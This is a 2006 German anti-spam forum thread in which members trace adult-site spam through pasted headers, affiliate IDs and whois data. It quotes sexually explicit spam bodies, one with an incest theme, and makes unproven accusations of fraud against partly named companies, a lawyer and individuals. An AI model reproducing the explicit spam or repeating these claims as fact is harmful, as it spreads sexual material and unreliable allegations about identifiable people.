"Daniela ist zwar schon 45 Jahre alt, aber noch lange nicht müde und wünscht sich einen Kerl mit dem sie ihren Mann betrügen kann. Wen jetzt so viel Offenheit schockiert, braucht sich gar nicht erst melden, denn Daniela ist eine Person die stets sagt was sie denkt" (skt.purefun.cc)

"Monika ist zwar schon 45 Jahre alt, aber noch lange nicht müde und wünscht sich einen Kerl mit dem sie ihren Mann betrügen kann. Wen jetzt so viel Offenheit schockiert, braucht sich gar nicht erst melden, denn Monika ist eine Person die stets sagt was sie denkt" (xcheck-online.de/index.htm)

Hier dann wieder das Angebot von Cyberservice (Impressum, nicht whois)
xl-kontakt.de/sex-kontakte/sexkontakt_1.htm

"Miriam erhofft sich von ihrem Eintrag und ihrer Anmeldung hier auf sexkontakte.cc endlich einen Mann zu finden, der ihre extremen Sexneigungen teilt"

"skt" ist wohl das Kürzel für das niederländische Wort "Sofortkontakte"
Im Exitlink gibt es noch mehr unappetitliches Zeugs der Hamburger Freunde.

Klar, bei den cybillinglinks erfolgt die Zuordnung über die WM-ID

und hier?
pe.puref**.cc/de/join.html
(wenn man nach diesem PE = Peter En** googlet, wird es zum verlinken zu heftig, zum studieren [der whois-Einträge, versteht sich] bleibt es spannend)

Also ich würde ein paar von den Seiten auf purefun suchen, die Englisch sind und würde das dann an die neuseeländische Botschaft in Deutschland und Holland und an die neuseeländische Regierung und an eine beliebige regierungsfeindliche Zeitung in Neuseeland schicken mit den schönsten Screenshots plus den dazu gehörigen Webmaster-IDs und den nötigen links, damit sie an geeigneter Stelle die Verantwortlichen erfragen können. Manchmal bringt so etwas mehr als man glaubt (und mehr Zeit geht auch nicht drauf dafür)

gation
03.06.2006, 23:43
Pfui Pfui, diese Bande
http://img405.imageshack.us/img405/9840/penis9wk.jpg

bambam
04.06.2006, 17:17
Folgendes ist bei mir eben gelandet.
Hier der Header und die Mail dazu.

eturn-Path: <Devine4Goss [at] math.auckland.ac.nz>
Delivery-Date: Sun, 04 Jun 2006 xx:xx:xx +0200
Received-SPF: none (mxeu14: 60.210.134.145 is neither permitted nor denied by domain of math.auckland.ac.nz) client-ip=60.210.134.145; envelope-from=Devine4Goss [at] math.auckland.ac.nz; helo=486AAEF8;
Received: from [60.210.134.145] (helo=486AAEF8)
by mx.kundenserver.de (node=mxeu14) with ESMTP (Nemesis),
ID: [ID filtered]
Received-SPF: none (mxeu0: 80.110.39.01 is neither permitted nor denied by domain of Cline.com;) client-ip=80.165.68.00; envelope-from=Devine4Goss [at] math.auckland.ac.nz; helo=4876RT.Cline.com;
Received: from pY814S9Y0.dip.t-dialin.net (HELO 4610SH) [80.100.88.20])
by marten-spars.co.nz (8.14.6/8.14.6) with ESMTP ID: [ID filtered]
MIME-Version: 1.0
Content-Type: multipart/related;
boundary="=_FB72CCDtpdhv5gbwxuYpn0"
Date: Sun, 04 Jun 2006 xx:xx:xx -0400
To: ... [at] .de
From: "Darren E. Lambert" <Devine4Goss [at] math.auckland.ac.nz>
X-Mailer: Mcintoshmail v2.5
Message-ID: [ID filtered]
Subject: Komm rein und f*** diese Mädchen hart!
Envelope-To: ... [at] .de
X-NAS-BWL: No match found for 'Devine4Goss [at] math.auckland.ac.nz (%27Devine4Goss [at] math.auckland.ac.nz)' (70 addresses, 0 domains)
X-NAS-Language: German
X-NAS-Bayes: #0: 5,20348E-165; #1: 1
X-NAS-Classification: 0
X-NAS-MessageID: [ID filtered]
X-NAS-Validation: {E667DCFB-02B3-4940-862E-D2A7F6695495}


Hallo Männer ! Ich bin HotJamie und wenn Du mich erobern willst, darfst Du im Bett vor allem nicht zu brav sein ! Denn ich geniesse es, wenn ein Mann mir den Verstand raubt und meine heissen Säfte stielt, während er meinen Körper als Spielwiese der Lust benutzt ! Eine intensives orales Vorspiel lässt mich schnell jede Hemmung verlieren und wenn mein F**** erstmal nass ist, will ich Deinen harten Kolben in den versautesten Stellungen spüren, bis wir L I V E im Chat gemeinsam explodieren !Hallo Männer ! Ich bin HotJamie und wenn Du mich erobern willst, darfst Du im Bett vor allem nicht zu brav sein ! Denn ich geniesse es, wenn ein Mann mir den Verstand raubt und meine heissen Säfte stielt, während er meinen Körper als Spielwiese der Lust benutzt ! Eine intensives orales Vorspiel lässt mich schnell jede Hemmung verlieren und wenn mein F*** erstmal nass ist, will ich Deinen harten Kolben in den versautesten Stellungen spüren, bis wir L I V E im Chat gemeinsam explodieren !

Dieses heisse Mädchen und noch viele Amateurinnen auf:
http://www.interessant.biz/livecams.html

Den Text musste ich aus Jungendschutzgründen entschärfen.

Investi
04.06.2006, 18:18
Der Link führt weiter zu http://www.amateurdatingcam.com/de/index.php?WMID=71972&WMEC=5&PID=1&LGID=de&Aufloesung=1280, einem Angebot unserer Freunde aus Holland/Hamburg/Karibik/...
Die Domain ist ein Fake, wurde erst im April eingerichtet. Soll lediglich der Umgehung von Spam-Filtern und Blacklists dienen.

Cyberservices wird immer penetranter unter Verwendung immer rechtswidrigerer Methoden und ein Anwalt aus Hamburg verdient da kräftig mit.

oliveer
04.06.2006, 18:31
Received: from [83.149.113.155] (helo=nl02.accessklick.com)
by mx24.web.de with esmtp (WEB.DE 4.107 #114)
ID: [ID filtered]
for xxx; Sun, 04 Jun 2006 xx:xx:xx +0200
Received: from 10.2.157.28 (helo=db01.accessklick.com)
by nl02.accessklick.com (envelope-from
<ums [at] db01.accessklick.com>)
with esmtp (Exim 4.50)
ID: [ID filtered]
for xxx; Sun, 04 Jun 2006 xx:xx:xx +0200
Received: from ums by db01.accessklick.com with local (Exim 4.50)
ID: [ID filtered]
for xxx; Sun, 04 Jun 2006 xx:xx:xx +0200
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="ISO-8859-1"
MIME-Version: 1.0
X-Mailer: MIME::Lite 3.01 (F2.72; A1.62; B3.04; Q3.03)
Date: Sun, 4 Jun 2006 xx:xx:xx UT
To: xxx
From: Webmaster <webmaster [at] cyberservices.nl>
Subject: =?ISO-8859-1?B?Umllc2lnZSBTY2h35G56ZSBpbiB0cm9wZmVuZGVuIGVuZ2VuIE11c2NoaXM=?=
Message-ID: [ID filtered]
Sender: ums [at] db01.accessklick.com

Das ist der blanke Wahnsinn!
Auf dieser Seite kannst Du erleben, wie den heissesten Bräuten ihre feuchten, engen Spalten aufgerissen werden, wie süssen Mädels so richtig die Rosette gedehnt und das Gesicht vollgespritzt wird- und das alles von Männern mit Schwänzen, so gross wie Salamis!
Bei diesen Typen gelten 25cm als klein, da kannst Du Dir ja ungefähr vorstellen, was hier so abgeht!

Sei dabei und werde Zeuge, wenn die Girls verzweifelt versuchen, die Riesenprügel bei einem geilen Blowjob in den Mund zu bekommen, ohne sich dabei den Unterkiefer auszurenken!

Das klingt unglaublich für Dich? Dann sieh Dir unseren kostenlosen Vorschaubereich an, dort kannst Du Dich davon überzeugen, dass alles hier gesagte den Tasachen entspricht.
Hier ist der Link:
http://www.grosseschwaenze.de/


Wenn Du diesen Newsletter nicht mehr erhalten möchtest, klicke einfach auf diesen Link:
http://www.memberarea.tv/nl.php?adr=info [at] radoerre.de

ISP does not wish to receive reports regarding http://www.memberarea.tv - ja is klar, dann verdient er ja nichts mehr ...

Aber wo wir da gerade beim Thema Anwalt sind... :rolleyes:

in diesem Sinne

Oliver

Investi
04.06.2006, 18:36
Die Domain ist ein Fake, wurde erst im April eingerichtet. Soll lediglich der Umgehung von Spam-Filtern und Blacklists dienen.

Cyberservices wird immer penetranter unter Verwendung immer rechtswidrigerer Methoden und ein Anwalt aus Hamburg verdient da kräftig mit.


Das Original der Seite findet sich unter http://www.friedlandergroup.com/. Eine Nachricht an diese Adresse ist bereits raus. Dürfte also nicht lange dauern, bis die Seite vom Netz ist.
Weitere Beschwerden an den Markenrechtsinhaber sollten die Angelegenheit beschleunigen - möglichst unter Beifügung der Spammail.

gation
06.06.2006, 01:15
/// off-topic ///
in ein paar tagen findet bei Hannover ein nettes Treffen statt:
j*ginforum.de/showthread.php?t=44030

Zu den Teilnehmern gehört:
K* von http://sexmoney.com
Es ist mir nicht ganz klar, ob es sich hier um K*G* handelt (42, Fort Lauderdale)

Michael R* (http://www.bewerber.de/impressum.php), Senior Partner (http://www.dict.cc/englisch-deutsch/senior+partner.html) of Cyber[tainment] (http://www.abendblatt.de/extra/service/100591.html?show=390318)services stated, “We are excited to have Kevin aboard..."
oder aber um Kevin H* --> webmaster-rac*.de/html/anmeldung/pkw/anmeldung.php?action=liste&start=20

oliveer
06.06.2006, 08:08
/// off-topic ///
in ein paar tagen findet bei Hannover ein nettes Treffen statt:
j*ginforum.de/showthread.php?t=44030

Zu den Teilnehmern gehört:
K* von http://sexmoney.com
Es ist mir nicht ganz klar, ob es sich hier um K*G* handelt (42, Fort Lauderdale)

oder aber um Kevin H* --> webmaster-rac*.de/html/anmeldung/pkw/anmeldung.php?action=liste&start=20

Ui ui ui , das ist ja ein Treffen der Extraklasse, da sind alle "seriösen" Geschäftsleute inkl. meinem Lieblingsanwalt, Frau Huch und die Österreicher zusammen ... Ich glaub ich sollte mal mit nem Kollegen aus Hannover telefonieren, vielleicht hat der ja eine nette Idee :rolleyes:

in diesem Sinne

Oliver

gation
06.06.2006, 08:26
Hast Du Dir die Wegbeschreibung angekuckt? Das muss ja echt idyllisch sein, das Scheunenteil. Ideen kann man da viele entwickeln, Phantasie vorausgesetzt. Vielleicht sind 125km von Hamburg zu viel für jemanden, der da hinfahren könnte. Muss ich mal verhandeln.

oliveer
06.06.2006, 08:31
Hast Du Dir die Wegbeschreibung angekuckt? Das muss ja echt idyllisch sein, das Scheunenteil. Ideen kann man da viele entwickeln, Phantasie vorausgesetzt. Vielleicht sind 125km von Hamburg zu viel für jemanden, der da hinfahren könnte. Muss ich mal verhandeln.

Kenn die Gegend da oben ganz gut, da ich Freunde und Kollegen in Hannover habe...

ACHSO, lt. der offiziellen HP ist die Party am 22.07 und nicht am 29.07 - siehe hier (http://www.awm24.de/meeting.html)

in diesem Sinne

Oliver

gation
06.06.2006, 08:44
///// off topic

///// offer topic

Ich habe vor einiger Zeit für einige Firmen solche Dialer entwickelt und kann somit etwas aus dem Nähkästchen plaudern.

Denn selbst jeder Erotikwebmaster, der Content sogenannter Affiliate-Anbieter in seine Seiten einbaut, wird abgezockt ohne Ende. Versprochen werden einem zwar meistens 50% des generierten Umsatzes, aber in Wirklichkeit hat man immer viel mehr Umsatz geschaffen als ausbezahlt wird. Wie Ihr wisst, kann man ja direkt online seine Umätze kontrollieren und die gezeigten Daten stimmen ja auch, aber nur, weil die Manipulation schon vorher stattgefunden hat.

So wurde ich z.B. angehalten, eine Kommastelle zu ändern, sodaß erst nach X Umsätzen auch nur X Auszahlung angezeit wird.

Und nichts ist doch einfacher als das, denn in jeder Abrechnungssoftware muß bekanntlich gerechnet werden und die jeweilige Formel zu ändern, dürfte wohl für niemanden ein Problem sein.

Deshalb rate ich hier jedem Webmaster: Macht eure eigenen Sachen und greift möglichst nicht auf die 'großen Anbieter' zurück. Klar habe auch ich 'NOCH' Affiliates von solchen Anbietern auf meinen Seiten aber nur von denen, für die ich nie programmiert habe.

Ich werde demnächst auf einer fremdgehosteten Seite (yahoo o.ä.) eine Liste veröffentlichen, auf der alle unseriösen Anbieter zu sehen sind. ---Ehrlich währt eben doch am längsten !
Quelle:web-ohne-nepp.de
Ein Dialerprogrammierer aus NRW packt aus? Hat man in Osnabrück etwa einen vergessen? Besteht Handlungsbedarf? (n.b.: Es geht hier um Betrug an Webmastern... Da gab es im Sommer 2004 eine interessante Geschichte, über massiven betrug an Webmastern. Mir ist bis heute nicht klar, was das mit Hausdurchsuchungen in Hamburg zu tun hatte)
Fortsetzung folgt...

gation
06.06.2006, 09:20
///// immer noch off topic /////

Da gab es im Sommer 2004 eine interessante Geschichte, über massiven betrug an Webmastern. Mir ist bis heute nicht klar, was das mit Hausdurchsuchungen in Hamburg zu tun hatteKleiner Fehler, es wurde nicht mit Hausdurchsuchungen in Hamburg in Verbindung gebracht, sondern mit Festnahmen in Paderborn (http://www.theregister.co.uk/2005/01/28/rogue_diallers_cuffed/).

oliveer
09.06.2006, 17:17
Nur mal eine kleine Statistik von diesen netten Hamburgern/Holländern - nur deren direkt verschickter Müll ... :mad:

06.05 - 14.05 - 50 eMails
14.05 - 31.05 - 38 eMails
01.06 - 09.06 - 17 eMails

Man sollte mit deren Seiten langsam auch mal etwas spielen... :rolleyes:

in diesem Sinne

Oliver

Fidul
01.07.2006, 17:58
Das Botnetz scheint wieder zu funktionieren. Statt der leeren Mails kam gestern wieder regulärer Cyberservices-Spam für http://linkscum.com/d/1.html. Heute scheint das Ding schon tot zu sein.

oliveer
10.07.2006, 08:12
Return-Path: <zksplzmwv [at] airliquide.com>
X-Original-To: xxx
Received: from localhost (mail-in-09.arcor-online.net [151.189.21.49])
by mail-in-08-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 8 Jul 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-09.arcor-online.net ([127.0.0.1])
by localhost (mail-in-09 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from agematch.com (ihcafehn.org [63.245.94.180])
by mail-in-09.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 8 Jul 2006 xx:xx:xx +0200 (CEST)
message-ID: [ID filtered]
From: "Karin Freya Weicher" <zksplzmwv [at] airliquide.com>
To: "Lea" <poor [at] spamvictim.tld>
Subject: Mike ist in der Kartei
Date: Sat, 08 Jul 2006 xx:xx:xx -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="Windows-1252";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869
X-Virus-Scanned: amavisd-new at arcor.de

Return-Path: <zksplzmwv [at] airliquide.com>
X-Original-To: xxx
Received: from localhost (mail-in-09.arcor-online.net [151.189.21.49])
by mail-in-08-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 8 Jul 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-09.arcor-online.net ([127.0.0.1])
by localhost (mail-in-09 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from agematch.com (ihcafehn.org [63.245.94.180])
by mail-in-09.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 8 Jul 2006 xx:xx:xx +0200 (CEST)
message-ID: [ID filtered]
From: "Karin Freya Weicher" <zksplzmwv [at] airliquide.com>
To: "Lea" <poor [at] spamvictim.tld>
Subject: Mike ist in der Kartei
Date: Sat, 08 Jul 2006 xx:xx:xx -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="Windows-1252";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869
X-Virus-Scanned: amavisd-new at arcor.de

http://skt.onlynewsbreak.com

Return-Path: <zksplzmwv [at] airliquide.com>
X-Original-To: xxx
Received: from localhost (mail-in-09.arcor-online.net [151.189.21.49])
by mail-in-08-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 8 Jul 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-09.arcor-online.net ([127.0.0.1])
by localhost (mail-in-09 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from agematch.com (ihcafehn.org [63.245.94.180])
by mail-in-09.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 8 Jul 2006 xx:xx:xx +0200 (CEST)
message-ID: [ID filtered]
From: "Karin Freya Weicher" <zksplzmwv [at] airliquide.com>
To: "Lea" <poor [at] spamvictim.tld>
Subject: Mike ist in der Kartei
Date: Sat, 08 Jul 2006 xx:xx:xx -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="Windows-1252";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869
X-Virus-Scanned: amavisd-new at arcor.de

Return-Path: <poor [at] spamvictim.tld>
X-Original-To: xxx
Received: from localhost (mail-in-09.arcor-online.net [151.189.21.49])
by mail-in-08-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 8 Jul 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-09.arcor-online.net ([127.0.0.1])
by localhost (mail-in-09 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from agematch.com (ihcafehn.org [63.245.94.180])
by mail-in-09.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 8 Jul 2006 xx:xx:xx +0200 (CEST)
message-ID: [ID filtered]
From: "Karin Freya Weicher" <zksplzmwv [at] airliquide.com>
To: "Lea" <poor [at] spamvictim.tld>
Subject: Mike ist in der Kartei
Date: Sat, 08 Jul 2006 xx:xx:xx -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="Windows-1252";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869
X-Virus-Scanned: amavisd-new at arcor.de

http://www.onlynewsbreak.com/en/index.html


Das Postfach von Frau Dörre schreit mal wieder nach ner Menge eMail-Weiterlungen... :rolleyes:

in diesem Sinne

Oliver

exe
10.07.2006, 09:48
Auch hier viermal eingeschlagen:

Received: from asahi1ex.akg.co.jp (mail.akg.co.jp [210.164.125.99])
by mail.*.de with ESMTP ID: [ID filtered]
for <homepage@*.de>; Sun, 9 Jul 2006 xx:xx:xx +0200 (CEST)
Received: from [210.164.125.110] ([210.164.125.110]) by asahi1ex.akg.co.jp with Microsoft SMTPSVC(6.0.3790.1830);
Sat, 8 Jul 2006 xx:xx:xx +0900
Received: from [210.93.13.77] by [210.164.125.110]
via smtpd (for mail.akg.co.jp [210.164.125.99]) with SMTP; Sat, 8 Jul 2006 xx:xx:xx +0900
Message-ID: [ID filtered]
From: "Eveline William Stuehlmeyer" <jddezdl@*.com>
To: "Nora" <homepage@*.de>
Subject: Daniela ist immer da
Date: Fri, 07 Jul 2006 xx:xx:xx -0-100
MIME-Version: 1.0
Content-Type: multipart/alternative;

Received: from mail.iem.gov.tr (mail.iem.gov.tr [212.175.85.226])
by mail.*.de with SMTP ID: [ID filtered]
for <*@*.de>; Sun, 9 Jul 2006 xx:xx:xx +0200 (CEST)
Received: (qmail 65464 invoked from network); 9 Jul 2006 xx:xx:xx +0300
Received: from unknown (HELO tecsol.com) (24.152.148.217)
by 0 with SMTP; 9 Jul 2006 xx:xx:xx +0300
Message-ID: [ID filtered]
From: "Tina & Sara Leyk" <uangeynyio@*.com>
To: "Lucas" <*@*.de>
Subject: Cornelia kam, sah und :-)
Date: Sun, 09 Jul 2006 xx:xx:xx -0-100
MIME-Version: 1.0
Content-Type: multipart/alternative;

Received: from mail.iem.gov.tr (mail.iem.gov.tr [212.175.85.226])
by mail.*.de with SMTP ID: [ID filtered]
for <homepage@*.de>; Sun, 9 Jul 2006 xx:xx:xx +0200 (CEST)
Received: (qmail 36094 invoked from network); 9 Jul 2006 xx:xx:xx +0300
Received: from unknown (HELO bakerhill.com) (218.185.6.123)
by 0 with SMTP; 9 Jul 2006 xx:xx:xx +0300
Message-ID: [ID filtered]
From: "Sophia Paasch" <upbjfa@*.net>
To: "Rita" <homepage@*.at>
Subject: Katharina ist da auch gekommen
Date: Sun, 09 Jul 2006 xx:xx:xx -0-100
MIME-Version: 1.0
Content-Type: multipart/alternative;

Received: from server1.cominsol.net (unknown [207.234.184.106])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(Client CN "plesk", Issuer "plesk" (not verified))
by mail.*.de with ESMTP ID: [ID filtered]
for <*@*.de>; Mon, 10 Jul 2006 xx:xx:xx +0200 (CEST)
Received: (qmail 27842 invoked from network); 7 Jul 2006 xx:xx:xx -0000
Received: from unknown (HELO arlington.com) (66.226.224.198)
by 207-36-5-116.ptr.primarydns.com with SMTP; 7 Jul 2006 xx:xx:xx -0000
Message-ID: [ID filtered]
From: "Jacqueline Siebmann" <jdwgnu@*.com>
To: "Julia" <exdrawbridge435gv@*.at>
Subject: Tobias sendet diesen Link
Date: Fri, 07 Jul 2006 xx:xx:xx -0-100
MIME-Version: 1.0
Content-Type: multipart/alternative;

Beworben: http://www.onlynewsbreak.com/de/index.html
Die Seite lädt aber überraschend träge und auch nicht vollständig, werde sie wohl ein paar mal reloaden müssen. :(

kjz1
10.07.2006, 16:20
Beworben: http://www.onlynewsbreak.com/de/index.html

Wie üblich, plump gefälschtes Whois. (http://de.wikipedia.org/wiki/Sri_Chinmoy)

- kjz

MickyMouse
02.09.2006, 17:48
Hab grad auch das Problem mit dieser ominösen Firma.. Hab mit meiner Lebensgefährtin bis dato noch nie von dieser Firma etwas gehört noch etwas gelesen. Es war zwar ein Abbuchungsversuch auf unserem Konto, den wir aber sofort wieder stornieren liesen und heute kam eine Mahnung von Hamburger Anwälten. wie gesagt, hab dann mal nachgeschaut um was es sich bei dieser Firma handelt und sofor wieder was anderes aufgerufen.. Bin fast der überzeugung, das diese Firma mit nicht sauberen Methoden arbeitet und willkürlich Abzocke betreibt.. Ist meine Personliche Meinung und keine Unterstellung-rein vorsorglich bemerkt. ;)

Gerlach
02.09.2006, 19:30
Hab grad auch das Problem mit dieser ominösen Firma.. ...
Leider kommt es auch vor, dass Dritte sich real existierender Kontodaten bedienen, um sich damit Dienste zu erschleichen. Der Dienstleister bucht ahnungslos ab beim ahnungslosen Opfer. Das ist mir persönlich auch schon passiert, wenn auch bei einem ganz anderen Dienstleister. Du hast richtig gehandelt mit der Rückbuchung und dazu könntest du die noch darauf hinweisen, dass offenbar jemand eure Daten missbraucht hat. Ab dann könnt ihr getrost den gerichtlichen MahnbescheID: [ID filtered]

Julia1966
14.10.2006, 19:46
Hallo Leute,

werde seit Taaaaagen in meinem e-mail-Fach meiner Firma von einem "Jonny" zugemüllt.... geht offensichtlich um ne Pornoseite:


Received: from [211.234.93.146] (helo=mailcity.com) by mx32.web.de with esmtp (WEB.DE 4.107 #114) ID: [ID filtered]
Received: from 253.242.178.166 by 137.211.104.203.mx0.sunline.net (Postfix) with SMTP ID: [ID filtered]
From: "jonny" <jonny [at] sunline.net>
To: <xxxx>, <poor [at] spamvictim.tld>, <poor [at] spamvictim.tld>
Cc: <xxxxxde> Subject: Liebe Cousine, würdest du deinen Cousin poppen für Geld?
Date: Sat, 14 Oct 2006 xx:xx:xx -0-200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_1178_01C6EF99.82587DB0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: jonny [at] sunline.net

Hi xxxxxx, Die wahre Entstehung eines Pornostars!! Liebe Cousine, würdest du deinen Cousin poppen für Geld?? Also, es war wieder mal soweit und alter Schwede diesmal war ich fällig! Als ich den Raum betrat sah ich meine Cousine Misty (vierten Grades oder so)! Versteht mich nicht falsch... sie gehört vielleicht zur Familie, aber sie ist ein verdammt heisses Stück!!!! Diese Szene war in so vielen Belangen falsch aber ich muss gestehen, dass mich das total angemacht hat. Um eine lange Geschichte kurz zu halten, ich habe darauf geachtet das ALLES in der Familie bleibt... und das wörtlich! http://umef.regflout.com/g/f.html tschüß, jonny *************************************************** Wenn Du keine eMails mehr möchtest, klicke bitte hier: http://052.regflout.com/g/f.html


Whois- Abfrage ergab: erste Adresse Seoul, zweite USA. Auf meiner privaten E-Mail- Adresse ist er jetzt auch aufgeschlagen. Hat da Jemand von Euch Erfahrung? Wie werd ich den los?????:mad: :mad:

Gruß Julia

Fidul
15.10.2006, 01:44
Sieh mal einer an, der Cyberservices-Spammer ist also wieder mit der alten Methode unterwegs. Da können wir uns wohl auf eine neue Welle freuen. Und natürlich ist es wieder die WMID=71399.

Abmeldung jetzt bei relmolui4 [at] lycos.com

skater
15.10.2006, 02:19
Hallo Julia,
Cyberservices ist bekannt für seine Spammerei.
Wenn du einmal ne Email von denen bekommen hast, kannst die Addy eigentlich gleich wegschmeissen, der spammt ohne ende.
Bekomme auf eine Email-Adresse von mir seit mind. nem Jahr spam von Cyberservices.
Am besten die Addy wegschmeißen und ne neue zulegen.
Vielleicht nicht der beste Tipp den ich hier bieten kann, dennoch n recht wirksamer.

Man sollte sich aber lieber nicht bei relmolui4 [at] lycos.com abmelden ;)

Julia1966
15.10.2006, 12:08
Danke für die Reaktionen,

da das eine meine Büro- E- Mail- Adresse ist, muss ich wohl erst mal damit leben. Ich mache niemals einen Link auf... auch nicht den zum Abmelden. Hatte letztens den Fall, dass eine Pishing- Mail mit Anhang kam. Der Anhang war "angeblich" virenfrei (durch web.de geprüft). Hab mir den Spass gemacht, ihn nochmal zu prüfen... und was war? Trojanisches Pferd an Bord. Ach wie schön! Bekomme gerade ein Spam- Fax rein... bedeutet Arbeit: Scannen und verpetzen... wie ich Werbung hasse!

Gruß Julia

skater
15.10.2006, 12:15
Ja, du wirst wohl erstmal leider damit leben müssen, ich tu es auch, aber bei mir geht das schon alles automatisch in den Spamordner und so muss ich nicht noch alles extra aussortieren ;)
Hehe, dann wünsche ich dir erstmal viel spass beim Fax-Spammer ärgern :clown:

Julia1966
15.10.2006, 12:21
Ja, bei mir wird auch automatisch alles vorsortiert. Normalerweise schmeiß ich den Spam- Müll auch gleich weg. Aber einiges nervt mich trotzdem... z.B. wenn ein "jonny" mich zumüllt! Oder wenn irgendeine "Bank" möchte, dass ich vertrauliche Daten zusende! Diese Mails leite ich meist umgehend zu den Sicherheitsabteilungen der "richtigen" Banken weiter. Mache mir aber vorher den Spass, eine whois- Abfrage zu starten... reine Neugierde... wie Frauen nunmal sind;) ;)

Gruß Julia:p

Julia1966
15.10.2006, 17:41
Mir platzt bald der Kragen! Im Stundentakt neue Nachrichten von jonny. Über meine Betriebsmailadr. habe ich heut mittag geantwortet, dass ich ein 16 jähriges Mädchen bin und sie sich ins Knie fi... können. Bisher 4 Stunden Ruhe. Eben noch eine mail über die andere Adresse verfasst:" Hallo ich bin Chrissi und 10 Jahre alt. Darf ich solche mails erhalten? Werde nachher mal Papi fragen, er ist Polizist." Mal sehen, ob da jetzt auch Ruhe ist.....:mad: :mad:

oliveer
15.10.2006, 17:50
Mir platzt bald der Kragen! Im Stundentakt neue Nachrichten von jonny. Über meine Betriebsmailadr. habe ich heut mittag geantwortet, dass ich ein 16 jähriges Mädchen bin und sie sich ins Knie fi... können. Bisher 4 Stunden Ruhe. Eben noch eine mail über die andere Adresse verfasst:" Hallo ich bin Chrissi und 10 Jahre alt. Darf ich solche mails erhalten? Werde nachher mal Papi fragen, er ist Polizist." Mal sehen, ob da jetzt auch Ruhe ist.....:mad: :mad:

Die Holländer sind eben vollkommen schmerzfrei und bewegen sich, da sie den Müll aus dem Ausland verbreiten, in einem für sie sicherem Raum. Ich hab denen auch schon mehrfach wegen einiger Aktionen auf die Finger gehauen bzw. hauen lassen ... danach war ne Weile Ruhe, aber anscheinend brauchen die doch mal die volle Dröhnung mit dem Komplettprogramm...

Es gibt da jemanden, der sammelt solche eMails :rolleyes: - näheres per PN, ansonsten krieg ich gleich wieder was auf die Finger und das möchte ich irgendwie schon vermeiden...

in diesem Sinne

Oliver

Julia1966
15.10.2006, 18:11
Mist, die Absenderadresse stimmt bereits nicht mehr. Ist zurückgekommen. Mir ist vorher schon aufgefallen, dass "jonny" zwar immer dabei ist, aber die Abs.adresse dahinter ständig wechselt. Diese Schwei...priester.

Gruß Julia:mad: :mad:

Julia1966
15.10.2006, 20:15
Eben eingetrudelt:


-----Ursprüngliche Nachricht-----
> Von: "jonny" <jonny [at] macatawa.com>
> Gesendet: 15.10.06 xx:xx:xx
> An: <xxx [at] web.de>, <xxx [at] web.de>, <xxx0 [at] web.de>, <xxx [at] web.de>, <xxx [at] web.de>
> CC: <xxxx [at] web.de>
> Betreff: kotorimonou82 so ein dicker Prügel im Po

> Servus kotorimonou82,
>
> Anna:
> Bisschen lieb kommt die Kleine aber schon rüber. Zumindest brauchen unsere Jungs nicht
> so viel überreden. Ab in die Bude und dann geht es zur Sache. Erst mal die leckeren Brüste
> kosten und dann die Fotze feucht reiben. Die Kleine Anna ist gut dabei und
> Zungenspiele beherrscht sie auch. Nebenbei ist die Fotze eigentlich schon eng genug,
> aber wie das Luder vor Geilheit quiekt, als so ein dicker Prügel in ihrem Arsch
> verschwindet ist schon hammergeil. Akkurater Lustschmerz und auch Doppelaction muss sein.
>
> http://usfn.ragfladk.com/g/b.html
>
> ciao
> jonny
>
> ***************************************************
> Wenn Du keine eMails mehr möchtest, klicke bitte hier:
> http://657.ragfladk.com/g/b.html
>

ICH BIN STINKSAUER!!!:mad:

Sven Udo
15.10.2006, 23:23
@Julia1966, hast du es schon mit den Filterregeln von web.de versucht?

Ich habe diesen "jonny" auch bekommen, und ihn mir schnell wieder "vom Hals geschafft".
Da er - bei mir - immer "jonny" im Absender hatte.
Genauso wie bei dir:
-----Ursprüngliche Nachricht-----
> Von: "jonny" <jonny [at] macatawa.com>Also dann in dieser Reihenfolge:

web.de --> Ordner Verwaltung --> Ordner Unerwünscht -->
(dort wird vermutlich jonny's Mails sein) --> Ordnereinstellungen -->
